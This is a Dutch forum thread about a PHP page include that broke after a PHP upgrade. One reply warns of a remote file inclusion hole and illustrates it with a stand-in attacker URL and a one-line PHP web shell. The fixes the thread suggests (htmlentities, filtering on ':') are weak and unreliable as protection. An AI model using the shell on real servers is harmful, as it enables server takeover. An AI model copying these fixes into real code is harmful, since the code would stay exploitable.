Voordat mijn provider had geupdate naar PHP 5.0.4 werkte alles gewoon. En werd de gevraagde pagina gewoon geopend in de index.php
Nu echter gebeurt er helemaal niets.
Ik zoek nu al een week naar een oplossing maar vanwege mijn gebrek aan kennis wil ik nu dan toch hulp vragen.
Wie kan mij een duwtje in de goede richting geven?
Het is een slechte gewoonte om meteen een variabele op te roepen die in de querystring zit, en waarschijnlijk staat register_globals nu ook uit.
Dus moet je
$_GET["id"] gebruiken ipv $id. Dan komt gelijk punt twee, wat jij nu hebt is een veiligheidslek. Als ik nu voor id bijv. http://www.evilserver.php/system.php?cmd=ls mee stuur en in dat bestand staat: <?php system($_GET["cmd"]); ?> Zou ik jou server uiteindelijk best kunnen verkloten. Dus doe daar nog ff een htmlentities($_GET["id"], ENT_QUOTES) en het is een stuk beter :).
Dat is inderdaad nog beter ;)
Ik denk trouwens dat filteren op : al genoeg is, aangezien die toch niet in filesystem voor kunnen komen. (behalve op een mac als directory splitsing, al doet \ het hier ook prima)
Kan je de // niet escapen? Dan komt hij wel door de validatie, maar volgens mij filtert hij hem er dan bij de aanvraag zelf weer uit. Weet niet zeker.
